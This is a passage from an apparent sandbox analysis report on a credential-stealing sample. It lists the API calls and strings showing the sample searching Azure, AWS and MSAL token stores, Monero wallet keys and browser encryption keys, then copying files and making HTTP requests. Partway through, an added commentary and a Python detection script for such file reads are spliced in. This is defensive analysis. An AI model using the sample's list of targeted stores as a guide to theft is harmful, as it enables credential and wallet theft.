                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: c5ee35f02f0235ecbae9f2e829b66cf503b47650b7e31cb4a92c62d1247cf8a4
                              • Instruction ID: d0af570dfe9c51d9e901fa7f2556ccdd722a383c13c6195232be0d896b840528
                              • Opcode Fuzzy Hash: c5ee35f02f0235ecbae9f2e829b66cf503b47650b7e31cb4a92c62d1247cf8a4
                              • Instruction Fuzzy Hash: 4781DDB191011CABDB28DB54CC95FEAB7B8FB48700F0086D9E209A7190DF716B89CF95
                              APIs
                                • Part of subcall function 00BF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BF8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00BF4DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 00BF4DCD
                                • Part of subcall function 00BF4910: wsprintfA.USER32 ref: 00BF492C
                                • Part of subcall function 00BF4910: FindFirstFileA.KERNEL32(?,?), ref: 00BF4943
                              • lstrcat.KERNEL32(?,00000000), ref: 00BF4E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 00BF4E59
                                • Part of subcall function 00BF4910: StrCmpCA.SHLWAPI(?,00C00FDC), ref: 00BF4971
                                • Part of subcall function 00BF4910: StrCmpCA.SHLWAPI(?,00C00FE0), ref: 00BF4987
                                • Part of subcall function 00BF4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00BF4B7D
                                • Part of subcall function 00BF4910: FindClose.KERNEL32(000000FF), ref: 00BF4B92
                              • lstrcat.KERNEL32(?,00000000), ref: 00BF4EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00BF4EE5
                                • Part of subcall function 00BF4910: wsprintfA.USER32 ref: 00BF49B0
                                • Part of subcall function 00BF4910: StrCmpCA.SHLWAPI(?,00C008D2), ref: 00BF49C5
                                • Part of subcall function 00BF4910: wsprintfA.USER32 ref: 00BF49E2
                                • Part of subcall function 00BF4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00BF4A1E
                                • Part of subcall function 00BF4910: lstrcat.KERNEL32(?,009BF3B0), ref: 00BF4A4A
                                • Part of subcall function 00BF4910: lstrcat.KERNEL32(?,00C00FF8), ref: 00BF4A5C
                                • Part of subcall function 00BF4910: lstrcat.KERNEL32(?,?), ref: 00BF4A70
                                • Part of subcall function 00BF4910: lstrcat.KERNEL32(?,00C00FFC), ref: 00BF4A82
                                • Part of subcall function 00BF4910: lstrcat.KERNEL32(?,?), ref: 00BF4A96
                                • Part of subcall function 00BF4910: CopyFileA.KERNEL32(?,?,00000001), ref: 00BF4AAC
                                • Part of subcall function 00BF4910: DeleteFileA.KERNEL32(?), ref: 00BF4B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: 888d737fc7a0f6f52be463480bd15424b0e1614d2a30ca5830866c0b23846c79
                              • Instruction ID: 0d0c541264d1a249b8dda25824b70855f2c797e87141d504b185c83e509f84ed
                              • Opcode Fuzzy Hash: 888d737fc7a0f6f52be463480bd15424b0e1614d2a30ca5830866c0b23846c79
                              • Instruction Fuzzy Hash: DB4154B99402086BDB64F760DC4BFEE7278AB64704F0444A4B689660C1EEB45BCDCB92
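Taken together, the records above show one process walking several unrelated credential stores in sequence: FileZilla's recentservers.xml, a Monero wallet.keys file, and the `\.azure\`, `\.aws\` and `\.IdentityService\` directories (with msal.cache) that hold cloud CLI and MSAL tokens. No legitimate application reads all of those, which makes the combination a better detection than any single path. The script below is an added detection sketch, not code from the report or the sample: the path patterns are taken from the report's string tables, while the event schema, the expected-reader allowlist and the telemetry lines are constructed and must be mapped to your own EDR or Sysmon fields.

```python
"""
Detection sketch (added example, not part of the Joe Sandbox report or the sample):
score file-access telemetry for the credential stores this sample enumerates.
Path patterns come from the report's string tables; the event tuple format,
the expected-reader lists and SAMPLE_EVENTS are constructed assumptions.
"""
import fnmatch
from collections import defaultdict

# Backslash-normalised, lower-cased glob -> logical store name.
CREDENTIAL_STORES = {
    "*\\appdata\\roaming\\filezilla\\recentservers.xml": "filezilla",
    "*\\monero\\wallet.keys": "monero_wallet",
    "*\\.azure\\*": "azure_cli",
    "*\\.aws\\*": "aws_cli",
    "*\\.identityservice\\*": "msal_identityservice",
    "*\\msal.cache": "msal_cache",
}

# Processes that are expected to read each store (assumed allowlist; tune it).
EXPECTED_READERS = {
    "filezilla": {"filezilla.exe"},
    "monero_wallet": {"monero-wallet-gui.exe", "monero-wallet-cli.exe"},
    "azure_cli": {"az.exe", "python.exe"},  # the az CLI runs under python.exe
    "aws_cli": {"aws.exe"},
    "msal_identityservice": {"az.exe", "python.exe", "powershell.exe"},
    "msal_cache": {"az.exe", "python.exe", "powershell.exe"},
}


def classify_path(path):
    """Map a file path to a credential-store name, or None if it is not one."""
    p = path.replace("/", "\\").lower()
    for pattern, store in CREDENTIAL_STORES.items():
        if fnmatch.fnmatchcase(p, pattern):
            return store
    return None


def score_events(events):
    """events: iterable of (pid, image_name, path) file-read events.
    Returns {pid: (image_name, sorted list of stores)} for every process that
    read a credential store it is not an expected reader of."""
    touched = defaultdict(set)
    images = {}
    for pid, image, path in events:
        store = classify_path(path)
        if store is None:
            continue
        if image.lower() in EXPECTED_READERS.get(store, set()):
            continue
        touched[pid].add(store)
        images[pid] = image
    return {pid: (images[pid], sorted(stores)) for pid, stores in touched.items()}


def verdict(stores):
    """One store may be a misconfigured helper; three or more distinct stores
    read by one process is the stealer pattern this report documents."""
    if len(stores) >= 3:
        return "high"
    return "medium" if len(stores) == 2 else "low"


# Constructed telemetry modelled on Sysmon-style file-read events.
SAMPLE_EVENTS = [
    (4120, "filezilla.exe", r"C:\Users\u\AppData\Roaming\FileZilla\recentservers.xml"),
    (5188, "file.exe", r"C:\Users\u\AppData\Roaming\FileZilla\recentservers.xml"),
    (5188, "file.exe", r"C:\Users\u\Documents\Monero\wallet.keys"),
    (5188, "file.exe", r"C:\Users\u\.azure\msal_token_cache.bin"),
    (5188, "file.exe", r"C:\Users\u\.aws\credentials"),
    (5188, "file.exe", r"C:\Users\u\.IdentityService\msal.cache"),
    (6001, "aws.exe", r"C:\Users\u\.aws\config"),
    (6400, "notepad.exe", r"C:\Users\u\.aws\config"),
]

if __name__ == "__main__":
    for pid, (image, stores) in score_events(SAMPLE_EVENTS).items():
        print(pid, image, verdict(stores), stores)
```

Only the process that mirrors the sample's behaviour scores "high"; a user opening `.aws\config` in an editor surfaces as "low", which is the right place for an analyst triage queue rather than an alert. Note that `.IdentityService\msal.cache` is attributed to the `.IdentityService` store because that pattern is matched first; reorder CREDENTIAL_STORES if you want the file-level label instead.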
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00BF906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: 88cc308a22ba8b40821329be4c8209d4dc5b1e17d993ebdea7e0a25abed45ef8
                              • Instruction ID: 1e09979b0f2341ddd66a6b5769c9a495fa80da90acf80eabb47793101bea83fe
                              • Opcode Fuzzy Hash: 88cc308a22ba8b40821329be4c8209d4dc5b1e17d993ebdea7e0a25abed45ef8
                              • Instruction Fuzzy Hash: 8671EBB1910208AFDB18DFE5DC89FEEB7F8BB48700F148558F615A7290DB74A909CB61
                              APIs
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00BF31C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00BF335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00BF34EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: b011ce348ab744b2f67db4a2e34072be31d36375163f61cff373b7c633751c78
                              • Instruction ID: 93a30d3bd73c6cc8b43cf58c8b5850aa2114042d98dea03722894fd9ce6a9b49
                              • Opcode Fuzzy Hash: b011ce348ab744b2f67db4a2e34072be31d36375163f61cff373b7c633751c78
                              • Instruction Fuzzy Hash: DE12DFB181010C9ADB19EB90DC92FFDB7B8AF14340F5081A9E60A77195EF746B4ECB52
                              APIs
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                                • Part of subcall function 00BE6280: InternetOpenA.WININET(00C00DFE,00000001,00000000,00000000,00000000), ref: 00BE62E1
                                • Part of subcall function 00BE6280: StrCmpCA.SHLWAPI(?,009BF440), ref: 00BE6303
                                • Part of subcall function 00BE6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00BE6335
                                • Part of subcall function 00BE6280: HttpOpenRequestA.WININET(00000000,GET,?,009BEC40,00000000,00000000,00400100,00000000), ref: 00BE6385
                                • Part of subcall function 00BE6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00BE63BF
                                • Part of subcall function 00BE6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BE63D1
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00BF5318
                              • lstrlen.KERNEL32(00000000), ref: 00BF532F
                                • Part of subcall function 00BF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00BF8E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00BF5364
                              • lstrlen.KERNEL32(00000000), ref: 00BF5383
                              • lstrlen.KERNEL32(00000000), ref: 00BF53AE
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: 863f15a9e4af50bda4a7128b18fcf1f81d8c799776ee0a1435d1fe854254da55
                              • Instruction ID: efdcef3fa46f1b379d98b9e2ede0645b1af4a502571fb87c4d4a15b942e6a316
                              • Opcode Fuzzy Hash: 863f15a9e4af50bda4a7128b18fcf1f81d8c799776ee0a1435d1fe854254da55
                              • Instruction Fuzzy Hash: 99510F7091014C9BCB18FF64CD96AFD77B9AF10340F5080A4EA0A6B591DF746B4ECB62
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: fe13d3b471ae164adcfbe0459283c1422945d573ca84a244449cbef0b2b7982e
                              • Instruction ID: 31cca1788f6b7bc58e9fc38045a25752fa4581f7171595c5bf29dd8cfef99db8
                              • Opcode Fuzzy Hash: fe13d3b471ae164adcfbe0459283c1422945d573ca84a244449cbef0b2b7982e
                              • Instruction Fuzzy Hash: F2C154B590021D9BCB18EF60DC89FFA73B8BF54304F1445E9F60AA7141DA70AA89CF91
                              APIs
                                • Part of subcall function 00BF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00BF8E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00BF42EC
                              • lstrcat.KERNEL32(?,009BEE20), ref: 00BF430B
                              • lstrcat.KERNEL32(?,?), ref: 00BF431F
                              • lstrcat.KERNEL32(?,009BD338), ref: 00BF4333
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BF8D90: GetFileAttributesA.KERNEL32(00000000,?,00BE1B54,?,?,00C0564C,?,?,00C00E1F), ref: 00BF8D9F
                                • Part of subcall function 00BE9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00BE9D39
                                • Part of subcall function 00BE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BE99EC
                                • Part of subcall function 00BE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BE9A11
                                • Part of subcall function 00BE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BE9A31
                                • Part of subcall function 00BE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BE148F,00000000), ref: 00BE9A5A
                                • Part of subcall function 00BE99C0: LocalFree.KERNEL32(00BE148F), ref: 00BE9A90
                                • Part of subcall function 00BE99C0: CloseHandle.KERNEL32(000000FF), ref: 00BE9A9A
                                • Part of subcall function 00BF93C0: GlobalAlloc.KERNEL32(00000000,00BF43DD,00BF43DD), ref: 00BF93D3
                              • StrStrA.SHLWAPI(?,009BEDD8), ref: 00BF43F3
                              • GlobalFree.KERNEL32(?), ref: 00BF4512
                                • Part of subcall function 00BE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BE4EEE,00000000,00000000), ref: 00BE9AEF
                                • Part of subcall function 00BE9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00BE4EEE,00000000,?), ref: 00BE9B01
                                • Part of subcall function 00BE9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BE4EEE,00000000,00000000), ref: 00BE9B2A
                                • Part of subcall function 00BE9AC0: LocalFree.KERNEL32(?,?,?,?,00BE4EEE,00000000,?), ref: 00BE9B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 00BF44A3
                              • StrCmpCA.SHLWAPI(?,00C008D1), ref: 00BF44C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00BF44D2
                              • lstrcat.KERNEL32(00000000,?), ref: 00BF44E5
                              • lstrcat.KERNEL32(00000000,00C00FB8), ref: 00BF44F4
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010C1000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010CA000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.00000000010D7000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399821180.00000000010D8000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399925399.0000000001271000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399939755.0000000001272000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_be0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: fc528627f922c07dc8a4019cb1e37da08c85310f9b318a5551222dd14573260d
                              • Instruction ID: 4421037e2f17d2dd43a0937130e590c6d2488d23f9f4f57e40db0452c1a7e20c
                              • Opcode Fuzzy Hash: fc528627f922c07dc8a4019cb1e37da08c85310f9b318a5551222dd14573260d
                              • Instruction Fuzzy Hash: 2E7116B6900208ABDB14EBA5DC9AFFE73B9AB48300F0445D8F605A7181DB74DB5DCB91
                              APIs
                                • Part of subcall function 00BE12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00BE12B4
                                • Part of subcall function 00BE12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00BE12BB
                                • Part of subcall function 00BE12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00BE12D7
                                • Part of subcall function 00BE12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00BE12F5
                                • Part of subcall function 00BE12A0: RegCloseKey.ADVAPI32(?), ref: 00BE12FF
                              • lstrcat.KERNEL32(?,00000000), ref: 00BE134F
                              • lstrlen.KERNEL32(?), ref: 00BE135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00BE1377
                                • Part of subcall function 00BFA740: lstrcpy.KERNEL32(00C00E17,00000000), ref: 00BFA788
                                • Part of subcall function 00BFA9B0: lstrlen.KERNEL32(?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BFA9C5
                                • Part of subcall function 00BFA9B0: lstrcpy.KERNEL32(00000000), ref: 00BFAA04
                                • Part of subcall function 00BFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BFAA12
                                • Part of subcall function 00BFA8A0: lstrcpy.KERNEL32(?,00C00E17), ref: 00BFA905
                                • Part of subcall function 00BF8B60: GetSystemTime.KERNEL32(00C00E1A,009BE6A8,00C005AE,?,?,00BE13F9,?,0000001A,00C00E1A,00000000,?,009B88D8,?,\Monero\wallet.keys,00C00E17), ref: 00BF8B86
                                • Part of subcall function 00BFA920: lstrcpy.KERNEL32(00000000,?), ref: 00BFA972
                                • Part of subcall function 00BFA920: lstrcat.KERNEL32(00000000), ref: 00BFA982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00BE1465
                                • Part of subcall function 00BFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00BFA7E6
                                • Part of subcall function 00BE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00BE99EC
                                • Part of subcall function 00BE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00BE9A11
                                • Part of subcall function 00BE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00BE9A31
                                • Part of subcall function 00BE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00BE148F,00000000), ref: 00BE9A5A
                                • Part of subcall function 00BE99C0: LocalFree.KERNEL32(00BE148F), ref: 00BE9A90
                                • Part of subcall function 00BE99C0: CloseHandle.KERNEL32(000000FF), ref: 00BE9A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 00BE14EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1399448428.0000000000BE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BE0000, based on PE: true
                              • Associated: 00000000.00000002.1399435795.0000000000BE0000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000C9D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000CC2000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399448428.0000000000E2A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000E3E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.1399587964.0000000000FC4000.00000040.00000001.01000000.00000003.sdmp
